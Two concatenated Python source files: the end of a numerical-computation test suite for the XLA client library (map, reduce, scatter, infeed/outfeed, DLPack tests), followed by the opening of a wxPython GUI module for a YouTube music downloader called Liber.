c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantS32Computation(), [0])
self._ExecuteAndCompareExact(c, expected=[1, 1, 1, 1])
def testMapEachElementToS64Constant(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantS64Computation(), [0])
self._ExecuteAndCompareExact(c, expected=[1, 1, 1, 1])
def testMapMulBy2F32(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateMulF32By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 4.0, 6.0, 8.0])
def testMapMulBy2F64(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateMulF64By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 4.0, 6.0, 8.0])
def testSimpleMapChainF32(self):
# Chains a map of constant-f32 with a map of mul-by-2
c = self._NewComputation()
const_f32 = c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantF32Computation(), [0])
c.Map([const_f32], self._CreateMulF32By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 2.0, 2.0, 2.0])
def testSimpleMapChainF64(self):
# Chains a map of constant-f64 with a map of mul-by-2
c = self._NewComputation()
const_f64 = c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantF64Computation(), [0])
c.Map([const_f64], self._CreateMulF64By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 2.0, 2.0, 2.0])
def testDivVectorsWithMapF32(self):
c = self._NewComputation()
c.Map((c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0])),
c.Constant(NumpyArrayF32([5.0, 5.0, 4.0, 4.0]))),
self._CreateBinaryDivF32Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[0.2, 0.4, 0.75, 1.0])
def testDivVectorsWithMapF64(self):
c = self._NewComputation()
c.Map((c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0])),
c.Constant(NumpyArrayF64([5.0, 5.0, 4.0, 4.0]))),
self._CreateBinaryDivF64Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[0.2, 0.4, 0.75, 1.0])
def testSelectAndScatterF32(self):
c = self._NewComputation()
c.SelectAndScatter(
c.Constant(NumpyArrayF32([[1., 2., 6.], [4., 5., 3.]])),
select=self._CreateBinaryGeF32Computation(),
window_dimensions=(2, 1),
window_strides=(1, 2),
padding=xla_client.PaddingType.VALID,
source=c.Constant(NumpyArrayF32([[0.1, 0.2]])),
init_value=c.Constant(NumpyArrayF32(1)),
scatter=self._CreateBinaryAddF32Computation())
self._ExecuteAndCompareClose(c, expected=[[1., 1., 1.2], [1.1, 1., 1.]])
def testSelectAndScatterF64(self):
c = self._NewComputation()
c.SelectAndScatter(
c.Constant(NumpyArrayF64([[1., 2., 6.], [4., 5., 3.]])),
select=self._CreateBinaryGeF64Computation(),
window_dimensions=(2, 1),
window_strides=(1, 2),
padding=xla_client.PaddingType.VALID,
source=c.Constant(NumpyArrayF64([[0.1, 0.2]])),
init_value=c.Constant(NumpyArrayF64(1)),
scatter=self._CreateBinaryAddF64Computation())
self._ExecuteAndCompareClose(c, expected=[[1., 1., 1.2], [1.1, 1., 1.]])
def testReduce1DtoScalarF32(self):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0])),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=10)
def testReduce1DtoScalarF64(self):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0])),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=10)
def testReduce2DTo1DDim0F32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=[5, 7, 9])
def testReduce2DTo1DDim0F64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=[5, 7, 9])
def testReduce2DTo1DDim1F32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[1])
self._ExecuteAndCompareClose(c, expected=[6, 15])
def testReduce2DTo1DDim1F64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[1])
self._ExecuteAndCompareClose(c, expected=[6, 15])
def testReduce3DAllPossibleWaysF32(self):
input_array = self._MakeSample3DArrayF32()
def _ReduceAndTest(*dims):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=dims)
self._ExecuteAndCompareClose(
c, expected=np.sum(input_array, axis=tuple(dims)))
_ReduceAndTest(0)
_ReduceAndTest(0, 1)
_ReduceAndTest(0, 2)
_ReduceAndTest(1, 2)
_ReduceAndTest(0, 1, 2)
def testReduce3DAllPossibleWaysF64(self):
input_array = self._MakeSample3DArrayF64()
def _ReduceAndTest(*dims):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=dims)
self._ExecuteAndCompareClose(
c, expected=np.sum(input_array, axis=tuple(dims)))
_ReduceAndTest(0)
_ReduceAndTest(0, 1)
_ReduceAndTest(0, 2)
_ReduceAndTest(1, 2)
_ReduceAndTest(0, 1, 2)
def testReduceWindowValidUnitStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1),
window_strides=(1, 1),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.]])
def testReduceWindowSameUnitStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1),
window_strides=(1, 1),
padding=xla_client.PaddingType.SAME)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.], [4., 5., 6.]])
def testReduceWindowValidGeneralStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1),
window_strides=(1, 2),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 9.]])
def testReduceWindowValidUnitStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1),
window_strides=(1, 1),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.]])
def testReduceWindowSameUnitStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1),
window_strides=(1, 1),
padding=xla_client.PaddingType.SAME)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.], [4., 5., 6.]])
def testReduceWindowValidGeneralStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1),
window_strides=(1, 2),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 9.]])
def testWhileF32(self):
cond = self._CreateTestF32Lt10Computation()
body = self._CreateMulF32By2Computation()
c = self._NewComputation()
init = c.ConstantF32Scalar(1.)
c.While(cond, body, init)
self._ExecuteAndCompareClose(c, expected=16.)
def testWhileF64(self):
cond = self._CreateTestF64Lt10Computation()
body = self._CreateMulF64By2Computation()
c = self._NewComputation()
init = c.ConstantF64Scalar(1.)
c.While(cond, body, init)
self._ExecuteAndCompareClose(c, expected=16.)
def testConditionalTrue(self):
c = self._NewComputation()
pred = c.ConstantPredScalar(True)
true_operand = c.ConstantF32Scalar(3.)
true_computation = self._CreateMulF32By2Computation()
false_operand = c.ConstantF32Scalar(2.)
false_computation = self._CreateConstantF32Computation()
c.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=6.)
def testConditionalFalse(self):
c = self._NewComputation()
pred = c.ConstantPredScalar(False)
true_operand = c.ConstantF32Scalar(3.)
true_computation = self._CreateMulF32By2Computation()
false_operand = c.ConstantF32Scalar(2.)
false_computation = self._CreateConstantF32Computation()
c.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=1.)
def testInfeedS32Values(self):
to_infeed = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
c.GetTupleElement(c.Infeed(xla_client.shape_from_pyval(to_infeed[0])), 0)
compiled_c = c.Build().Compile()
for item in to_infeed:
xla_client.transfer_to_infeed(item)
for item in to_infeed:
result = xla_client.execute_with_python_values(compiled_c)
self.assertEqual(result, item)
def testInfeedTuple(self):
to_infeed = (NumpyArrayS32([1, 2, 3, 4]), NumpyArrayS32([[7], [8]]))
c = self._NewComputation()
c.GetTupleElement(c.Infeed(xla_client.shape_from_pyval(to_infeed)), 0)
compiled_c = c.Build().Compile()
xla_client.transfer_to_infeed(to_infeed)
result = xla_client.execute_with_python_values(compiled_c)
np.testing.assert_equal(result[0], to_infeed[0])
np.testing.assert_equal(result[1], to_infeed[1])
def testInfeedThenOutfeedS32(self):
to_round_trip = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
x_and_token = c.Infeed(xla_client.shape_from_pyval(to_round_trip[0]))
x = c.GetTupleElement(x_and_token, 0)
token = c.GetTupleElement(x_and_token, 1)
c.Outfeed(x, token)
compiled_c = c.Build().Compile()
for want in to_round_trip:
execution = threading.Thread(target=lambda: compiled_c.Execute([]))
execution.start()
xla_client.transfer_to_infeed(want)
got = xla_client.transfer_from_outfeed(
xla_client.shape_from_pyval(to_round_trip[0]))
execution.join()
self.assertEqual(want, got)
def testScatter(self):
a = np.arange(9).astype(np.int32).reshape((3, 3))
scatter_indices = np.array([0, 2], dtype=np.int32)
updates = np.array([[10, 20, 30], [70, 80, 90]], dtype=np.int32)
dnums = xla_client.ScatterDimensionNumbers()
dnums.update_window_dims.append(1)
dnums.inserted_window_dims.append(0)
dnums.scatter_dims_to_operand_dims.append(0)
dnums.index_vector_dim = 1
c = self._NewComputation()
c.Scatter(
c.Constant(a), c.Constant(scatter_indices), c.Constant(updates),
self._CreateBinaryAddS32Computation(), dnums)
expected = np.array([[10, 21, 32], [3, 4, 5], [76, 87, 98]], dtype=np.int32)
self._ExecuteAndCompareClose(c, expected=expected)
class ErrorTest(ComputationTest):
def setUp(self):
self.f32_scalar_2 = NumpyArrayF32(2.0)
self.s32_scalar_2 = NumpyArrayS32(2)
def testCompileWithWrongElementTypeInLayout(self):
c = self._NewComputation()
c.SetOpMetadata(xla_client.CurrentSourceInfoMetadata())
c.ParameterFromNumpy(self.s32_scalar_2)
c.ClearOpMetadata()
options = xla_client.CompileOptions()
options.argument_layouts = [
xla_client.Shape.array_shape(np.dtype(np.float32), [])
]
def TestFun():
return c.Build().Compile(compile_options=options)
self.assertRaisesRegex(
RuntimeError, r".*Invalid argument shape.*"
r"expected s32\[\], got f32\[\].*", TestFun)
def testInvokeWithWrongElementType(self):
c = self._NewComputation()
c.SetOpMetadata(xla_client.CurrentSourceInfoMetadata())
c.ParameterFromNumpy(self.s32_scalar_2)
c.ClearOpMetadata()
def TestFun():
return xla_client.execute_with_python_values(c.Build().Compile(),
[self.f32_scalar_2])
self.assertRaisesRegex(
RuntimeError, r"Invalid argument: Argument does not match.*"
r"want s32\[\], got f32\[\].*", TestFun)
class ComputationRootTest(ComputationTest):
"""Tests related to setting the root of the computation."""
def testComputationRootDifferentFromLastOp(self):
c = self._NewComputation()
x = c.ParameterFromNumpy(NumpyArrayF32(2.0))
result = c.Add(x, c.ConstantF32Scalar(3.14))
extra = c.Add(result, c.ConstantF32Scalar(1.618)) # pylint: disable=unused-variable
arg = NumpyArrayF32(1.0)
compiled_c = c.Build(result).Compile()
ans = xla_client.execute_with_python_values(compiled_c, [arg])
np.testing.assert_allclose(ans, 4.14)
class SetShardingTest(ComputationTest):
"""Tests related to set OpSharding."""
def testSetSharding(self):
c = self._NewComputation()
sharding = xla_client.OpSharding()
sharding.type = sharding.type.REPLICATED
sharding.tile_assignment_dimensions.extend([1])
sharding.tile_assignment_devices.extend([0])
# Set Sharding.
c.SetSharding(sharding)
x = c.ParameterFromNumpy(NumpyArrayF32(2.0))
# Clear Sharding.
c.ClearSharding()
result = c.Add(x, c.ConstantF32Scalar(3.14))
extra = c.Add(result, c.ConstantF32Scalar(1.618)) # pylint: disable=unused-variable
arg = NumpyArrayF32(1.0)
compiled_c = c.Build(result).Compile()
ans = xla_client.execute_with_python_values(compiled_c, [arg])
np.testing.assert_allclose(ans, 4.14)
int_dtypes = [
np.int8, np.int16, np.int32, np.int64, np.uint8, np.uint16, np.uint32,
np.uint64
]
float_dtypes = [np.float16, np.float32, np.float64]
complex_dtypes = [np.complex64, np.complex128]
dlpack_dtypes = int_dtypes + float_dtypes + [bfloat16]
standard_dtypes = int_dtypes + float_dtypes + complex_dtypes + [np.bool_]
testcase_shapes = [
(),
(1,),
(2, 3),
(2, 0),
(0, 7),
(4, 1, 2),
(2, 1, 3),
(2, 4, 1),
(3, 1),
(1, 3),
]
def FormatShapeAndDtype(shape, dtype):
return "_{}[{}]".format(np.dtype(dtype).name, ",".join(map(str, shape)))
class DLPackTest(parameterized.TestCase):
# pylint: disable=g-complex-comprehension
@parameterized.named_parameters({
"testcase_name": FormatShapeAndDtype(shape, dtype),
"dtype": dtype,
"shape": shape
} for dtype in dlpack_dtypes for shape in testcase_shapes)
def testRoundTrip(self, dtype, shape):
x = np.array(np.random.rand(*shape) * 100, dtype=dtype)
backend = xla_client.get_local_backend()
buffer = xla_client.Buffer.from_pyval(x, backend=backend)
dlt = xla_client._xla.BufferToDLPackManagedTensor(buffer)
del buffer # Free "buffer" to make sure dlt retains ownership.
self.assertEqual(type(dlt).__name__, "PyCapsule")
y = xla_client._xla.DLPackManagedTensorToBuffer(dlt, backend.client)
np.testing.assert_array_equal(x, y.to_py())
def testTensorsCanBeConsumedOnceOnly(self):
x = np.array(np.random.rand(3, 4, 5, 6), dtype=np.float32)
backend = xla_client.get_local_backend()
buffer = xla_client.Buffer.from_pyval(x, backend=backend)
dlt = xla_client._xla.BufferToDLPackManagedTensor(buffer)
def ConsumeDLPackTensor():
_ = xla_client._xla.DLPackManagedTensorToBuffer(dlt, backend.client)
ConsumeDLPackTensor()
self.assertRaisesRegex(RuntimeError,
".*a DLPack tensor may be consumed at most once.*",
ConsumeDLPackTensor)
class BufferProtocolTest(parameterized.TestCase):
# pylint: disable=g-complex-comprehension
@parameterized.named_parameters({
"testcase_name": FormatShapeAndDtype(shape, dtype),
"dtype": dtype,
"shape": shape
} for dtype in standard_dtypes for shape in testcase_shapes)
def testRoundTrip(self, dtype, shape):
x = np.array(np.random.rand(*shape) * 100, dtype=dtype)
x_ptr = x.__array_interface__["data"][0]
backend = xla_client.get_local_backend("cpu")
buffer = xla_client.Buffer.from_pyval(x, backend=backend)
y = np.array(buffer, copy=False)
y_ptr = y.__array_interface__["data"][0]
np.testing.assert_array_equal(x, y)
# If the input was sufficiently aligned, the input and output should alias.
self.assertTrue((x_ptr & 63) != 0 or x_ptr == y_ptr)
self.assertEqual(y_ptr, buffer.unsafe_buffer_pointer())
buffer2 = xla_client.Buffer.from_pyval(x, backend=backend, force_copy=True)
z = np.array(buffer2, copy=False)
self.assertNotEqual(x.__array_interface__["data"][0],
z.__array_interface__["data"][0])
def testDeleteWithActiveView(self):
x = np.random.randn(20, 10)
backend = xla_client.get_local_backend("cpu")
buffer = xla_client.Buffer.from_pyval(x, backend=backend)
buffer_ptr = buffer.unsafe_buffer_pointer()
y = np.array(buffer, copy=False)
buffer.delete()
# It is still legal to access `y`; the array view must keep it alive.
np.testing.assert_array_equal(x, y)
self.assertEqual(y.__array_interface__["data"][0], buffer_ptr)
class ProfilerTest(absltest.TestCase):
def testTraceMe(self):
# TODO(phawkins): These tests just check that the TraceMe context manager
# acts like a context manager and doesn't explode. Ideally we'd check that
# the profiler saw the traceme too.
with xla_client.profiler.TraceMe("test1"):
pass
with xla_client.profiler.TraceMe("test2", foo=123):
pass
with self.assertRaises(ValueError):
with xla_client.profiler.TraceMe("test3"):
raise ValueError("test")
@unittest.skipIf(portpicker is None, "Test requires portpicker")
def testStartServer(self):
port = portpicker.pick_unused_port()
server = xla_client.profiler.start_server(port)
del server
if __name__ == "__main__":
absltest.main()
|
GUI.py
|
"""
This module is a GUI created for the Liber module included in this package. It is intended to be used
with the Liber module only.
Copyright (C) Ryan Drew 2015
This module is free software and can be distributed, used and modified under the restrictions of the MIT license, which
should be included in this package.
"""
__author__ = 'ryan'
__version__ = 0.2
import wx
import wx.lib.scrolledpanel as scrolled
import logging
import threading
import StringIO
import Liber
import platform
import os
import sys
# this controls the size of each individual tile and the size that album artwork will be scaled to (w, h)
TILE_SIZE = [wx.DisplaySize()[0] * (2.0/3.0), 160] # 1900
ALBUM_ART_SIZE = (120, 90)
# setup logging
I_am_child = False
for x, y in logging.Logger.manager.loggerDict.items():
if x == '__main__':
I_am_child = True
        logger = logging.getLogger('__main__.' + __name__)
break
if I_am_child is False:
logger = logging.getLogger(__name__)
formatter = logging.Formatter('%(levelname)s:%(name)s:%(message)s')
con = logging.StreamHandler()
con.setLevel(logging.DEBUG)
con.setFormatter(formatter)
logger.addHandler(con)
logger.setLevel(logging.DEBUG)
logger.propagate = False # makes logger only use stream handler
# the following sets up a change album artwork event used to change the album artwork of a tile. Called by multiple
# threads in the Tile Class
myEVT_CHANGE_AA = wx.NewEventType()
EVT_CHANGE_AA = wx.PyEventBinder(myEVT_CHANGE_AA, 1)
class ChangeAAEvent(wx.PyCommandEvent):
"""
Event to signal that the album artwork in a Tile needs to be changed
"""
def __init__(self, etype, eid, value=None):
"""
Create the event object
"""
wx.PyCommandEvent.__init__(self, etype, eid)
self._value = value
def GetValue(self):
"""
Returns the value from the event
"""
return self._value
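# Usage sketch (added for illustration, not part of the original source): a worker
# thread that has fetched new artwork bytes hands them back to the GUI thread by
# posting this event to the owning Tile, which binds a handler for it in __init__:
#
#   artwork_bytes = open('cover.jpg', 'rb').read()   # hypothetical source of bytes
#   evt = ChangeAAEvent(myEVT_CHANGE_AA, -1, artwork_bytes)
#   wx.PostEvent(tile, evt)   # tile.Bind(EVT_CHANGE_AA, tile.onChangeAA) was done in Tile.__init__
#
# This is the same pattern Tile.changeAAThread uses further below.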
# the following sets up a change progress bar event that is used to change the progress bar of a tile. Called through
# the download method.
myEVT_UPDATE_PROGRESSBAR = wx.NewEventType()
EVT_UPDATE_PROGRESSBAR = wx.PyEventBinder(myEVT_UPDATE_PROGRESSBAR, 1)
class UpdateProgressBarEvent(wx.PyCommandEvent):
"""
Event to signal that the progress bar in a tile needs to be updated/changed
"""
def __init__(self, etype, eid, value=None):
"""
Create the event object
"""
wx.PyCommandEvent.__init__(self, etype, eid)
self._value = value
def GetValue(self):
"""
Returns the value from the event
"""
return self._value
# the following sets up a reset progress bar and download button event that is used to change their values to their
# defaults after a delay. Called whenever the progress bar's value is 100
myEVT_RESET_PROGRESSBAR_AND_DOWNLOADBUTTON = wx.NewEventType()
EVT_RESET_PROGRESSBAR_AND_DOWNLOADBUTTON = wx.PyEventBinder(myEVT_RESET_PROGRESSBAR_AND_DOWNLOADBUTTON, 1)
class ResetProgressBarAndDownloadButtonEvent(wx.PyCommandEvent):
"""
Event to signal that the progress bar and the download button need to reset to their default values
"""
def __init__(self, etype, eid, value=None):
"""
Create the event object
"""
wx.PyCommandEvent.__init__(self, etype, eid)
self._value = value
def GetValue(self):
"""
Returns the value from the event
"""
return self._value
class Tile(wx.Panel):
"""
Main GUI Element. Is added into the MainFrame. Pairs with a YTSong class and handles the static texts, text
controls, images and downloading (including progress bars).
"""
def __init__(self, url, parent, *args, **kwargs):
"""
Create the Tile. Parent is expected to be a MainFrame, url is a valid youtube url to be passed to pafy
:param url: URL to bind to through Liber
        :param parent: Parent of the Panel (typically the MainFrame class defined further below)
        :param args: args to pass to the super call
        :param kwargs: kwargs to pass to the super call. If the key 'parentLogger' is found, it will be used as
            the parent logger and the key/value pair will be removed from kwargs before being passed to the super.
"""
try:
self.logger = kwargs["parentLogger"].getChild("Tile:%s" % url[-11:])
del kwargs["parentLogger"]
except KeyError:
self.logger = logger.getChild("Tile:%s" % url[-11:])
# this needs to be added, so that in the case of a TypeError, the logger key will still be
# removed from the kwargs and a logger will still be obtained
except TypeError:
            self.logger = logger.getChild("Tile:%s" % url[-11:])
del kwargs["parentLogger"]
self.logger.info("Constructing")
super(Tile, self).__init__(parent, *args, **kwargs)
self.URL = url
self.enableDownloads = True
if Liber.ITUNES is not None:
self.downloadPath = Liber.ITUNES
self.tempDownloadPath = Liber.ITUNES_TEMP
elif Liber.DOWNLOADS is not None:
self.downloadPath = Liber.DOWNLOADS
self.tempDownloadPath = Liber.DOWNLOADS
else:
self.downloadPath = None
self.tempDownloadPath = None
self.logger.debug("Video download path: {}, Video temporary download path: {}".format(self.downloadPath,
self.tempDownloadPath))
self.downloadType = Liber.ID_AUDIO
self.logger.debug("Video download type set to its default - Liber.ID_AUDIO")
self.mainSizer = wx.BoxSizer(wx.VERTICAL)
self.metadataSizer = wx.BoxSizer(wx.HORIZONTAL)
self.Bind(EVT_CHANGE_AA, self.onChangeAA)
self.Bind(EVT_UPDATE_PROGRESSBAR, self.onUpdatePB)
self.Bind(EVT_RESET_PROGRESSBAR_AND_DOWNLOADBUTTON, self.onReset)
        # Assign metadata. Must be done like this to prevent this tile's metadata from being assigned the same memory
# location as Liber.METADATA
self.metadata = {}
for x, y in Liber.METADATA.items():
self.metadata[x] = y
try:
            self.logger.info("Pairing with a YTSong class")
self.YTSong = Liber.YTSong(url, log=self.logger.getChild("Liber"))
            self.logger.info("Pairing complete")
except Exception, e:
self.logger.error("Failure to pair with a YTSong class", exc_info=True)
errorSt = wx.StaticText(self, label="Failure to obtain video: %s" % e)
errorSt.Center()
            dialog = wx.MessageDialog(self, "Failure to obtain the video: %s" % e, "Error", style=wx.OK | wx.ICON_ERROR)
dialog.ShowModal()
raise
self.logger.info("Pulling album artwork from video's thumbnail.")
# location of where the album artwork is on the users' system (if file) or a URL
self.artworkSource = self.YTSong.thumb
        self.artworkImage = wx.EmptyImage(ALBUM_ART_SIZE[0], ALBUM_ART_SIZE[1])
self.artwork = wx.StaticBitmap(self, wx.ID_ANY, wx.EmptyBitmap(ALBUM_ART_SIZE[0], ALBUM_ART_SIZE[1]))
self.worker(self.changeAAThread, (self.YTSong.thumb,), {})
self.metadataSizer.Add(self.artwork, proportion=0, flag=wx.ALIGN_LEFT)
self.metadataSizer.Add((10, -1))
num_of_columns = 4.0
max_column_items = 4.0
column_items = 0
vSizer = wx.BoxSizer(wx.VERTICAL)
LINE_SIZE = (TILE_SIZE[0] - (self.artwork.GetSize()[0] + 10*4)) / num_of_columns
for x, y in self.metadata.items():
stLabel = y+':'
tcSize = (LINE_SIZE - self.GetTextExtent(stLabel)[0], -1)
self.metadata[x] = [wx.StaticText(self, wx.ID_ANY, label=stLabel),
wx.TextCtrl(self, wx.ID_ANY, size=tcSize)]
hSizer = wx.BoxSizer(wx.HORIZONTAL)
hSizer.Add(self.metadata[x][0], proportion=0, flag=wx.ALIGN_LEFT)
hSizer.Add(self.metadata[x][1], proportion=0, flag=wx.ALIGN_RIGHT)
vSizer.Add(hSizer)
vSizer.Add((-1, 5)) # a little bit of padding in my life...
column_items += 1
# add the current sizer to the metadata sizer, create a new vertical sizer, reset column_items and
# add one to the columns
if column_items == max_column_items:
self.metadataSizer.Add(vSizer)
self.metadataSizer.Add((10, -1))
vSizer = wx.BoxSizer(wx.VERTICAL)
column_items = 0
# need to do a little bit of cleanup, the loop was mainly used for laziness/convenience.
else:
self.radioIT = wx.RadioButton(self, wx.ID_ANY, label="iTunes")
self.radioIT.SetValue(True)
self.Bind(wx.EVT_RADIOBUTTON, self.onChangeDownLociTunes, self.radioIT)
self.radioDownload = wx.RadioButton(self, wx.ID_ANY, label="Downloads")
self.Bind(wx.EVT_RADIOBUTTON, self.onChangeDownLocDownloads, self.radioDownload)
self.radioDownloadPath = wx.RadioButton(self, wx.ID_ANY, label="Custom")
self.radioDownloadPath.Bind(wx.EVT_RADIOBUTTON, self.onChooseDownloadPath, self.radioDownloadPath)
stDownloadLoc = wx.StaticText(self, wx.ID_ANY, label="Download to:")
objects = [stDownloadLoc, self.radioIT, self.radioDownload, self.radioDownloadPath]
object_sizes = [self.GetTextExtent(stDownloadLoc.Label)[0], self.radioIT.GetSize()[0],
self.radioDownload.GetSize()[0], self.radioDownloadPath.GetSize()[0], ]
vSizer = self.sizeElementsInAColumn(objects, object_sizes, LINE_SIZE, vSizer, padding=(0, 0))
if Liber.ITUNES is None:
self.radioIT.Disable()
self.radioDownload.SetValue(True)
if Liber.DOWNLOADS is None:
self.radioDownload.Disable()
self.radioDownloadPath.SetValue(True)
stChangeAA = wx.StaticText(self, label="Change Album Artwork: ")
self.btAAPath = wx.Button(self, wx.ID_ANY, label="From File", size=(wx.Button.GetDefaultSize()[0],
self.GetTextExtent("Fl")[1]))
self.btAAPath.Bind(wx.EVT_BUTTON, self.onChooseAAPath, self.btAAPath)
self.btAAURL = wx.Button(self, wx.ID_ANY, label="From URL", size=(wx.Button.GetDefaultSize()[0],
self.GetTextExtent("FURL")[1]))
self.btAAURL.Bind(wx.EVT_BUTTON, self.onChooseAAURL, self.btAAURL)
self.btAAThumb = wx.Button(self, wx.ID_ANY, label="Thumbnail", size=(wx.Button.GetDefaultSize()[0],
self.GetTextExtent("Tlb")[1]))
self.btAAThumb.Bind(wx.EVT_BUTTON, self.onChooseAAThumb, self.btAAThumb)
objects = [stChangeAA, self.btAAPath, self.btAAURL, self.btAAThumb]
object_sizes = [self.GetTextExtent(stChangeAA.Label)[0], self.btAAPath.GetSize()[0],
self.btAAURL.GetSize()[0], self.btAAThumb.GetSize()[0]]
column_items += 1
if column_items == max_column_items or len(vSizer.GetChildren()) > 1:
self.metadataSizer.Add(vSizer)
self.metadataSizer.Add((10, -1))
vSizer = wx.BoxSizer(wx.VERTICAL)
else:
vSizer.Add((-1, 5))
# this bit of code will go through the object_sizes and determine how many of the objects it can fit
# in the space of LINE_SIZE.
vSizer = self.sizeElementsInAColumn(objects, object_sizes, LINE_SIZE, vSizer)
self.metadataSizer.Add(vSizer, proportion=0)
self.mainSizer.Add(self.metadataSizer)
self.mainSizer.Add((-1, 5))
stDownloadAs = wx.StaticText(self, wx.ID_ANY, label="as")
        # adding wx.RB_GROUP starts a new radio group, so these radio buttons can be selected alongside the previous
        # radio buttons: pressing one of the previous radio buttons does not 'de-press' any of these radio
        # buttons
self.radioAudio = wx.RadioButton(self, wx.ID_ANY, label="music", style=wx.RB_GROUP)
self.radioAudio.SetValue(True)
self.Bind(wx.EVT_RADIOBUTTON, self.onChangeDownloadType, self.radioAudio)
self.radioVideo = wx.RadioButton(self, wx.ID_ANY, label="video.")
self.Bind(wx.EVT_RADIOBUTTON, self.onChangeDownloadType, self.radioVideo)
self.progressBar = wx.Gauge(self, id=wx.ID_ANY, range=100, size=(TILE_SIZE[0], -1), style=wx.GA_HORIZONTAL)
self.btDownload = wx.Button(self, id=wx.ID_ANY, label="")
self.updateDownloadLabel()
self.btDownload.Bind(wx.EVT_BUTTON, self.download, self.btDownload)
hSizer = wx.BoxSizer(wx.HORIZONTAL)
hSizer.Add(self.btDownload, flag=wx.ALIGN_LEFT)
hSizer.Add((5, -1))
